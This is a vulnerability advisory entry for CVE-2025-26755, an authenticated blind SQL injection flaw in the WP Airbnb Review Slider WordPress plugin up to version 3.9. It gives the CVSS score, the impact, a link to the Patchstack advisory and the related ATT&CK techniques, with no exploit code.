CVE-2025-26755
Published: 16 February 2025
Description
Adversaries may leverage databases to mine valuable information.
Security Summary
CVE-2025-26755 is an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability (CWE-89) that enables Blind SQL Injection in the WP Airbnb Review Slider plugin (wp-airbnb-review-slider) developed by jgwhite33 for WordPress. The flaw affects all versions of the plugin from its initial release through 3.9 inclusive. Published on 2025-02-16, it carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L).
Exploitation requires network access with low complexity and high privileges (PR:H), such as those held by authenticated WordPress users with elevated roles like administrators. No user interaction is needed. Attackers can achieve high confidentiality impact by extracting sensitive data from the database via blind SQL injection techniques, with low availability impact and no integrity impact, while changing the scope of the affected component.
The Patchstack advisory provides further details on this vulnerability in the WP Airbnb Review Slider plugin up to version 3.9, available at https://patchstack.com/database/Wordpress/Plugin/wp-airbnb-review-slider/vulnerability/wordpress-wp-airbnb-review-slider-plugin-3-9-sql-injection-vulnerability?_s_id=cve.
Details
- CWE(s)
MITRE ATT&CK Enterprise Techniques
Why these techniques?
SQL injection vulnerability in public-facing WordPress plugin directly enables T1190 (exploitation of public-facing application) and facilitates T1213.006 (data collection from databases) via blind SQL injection for exfiltrating sensitive DB data.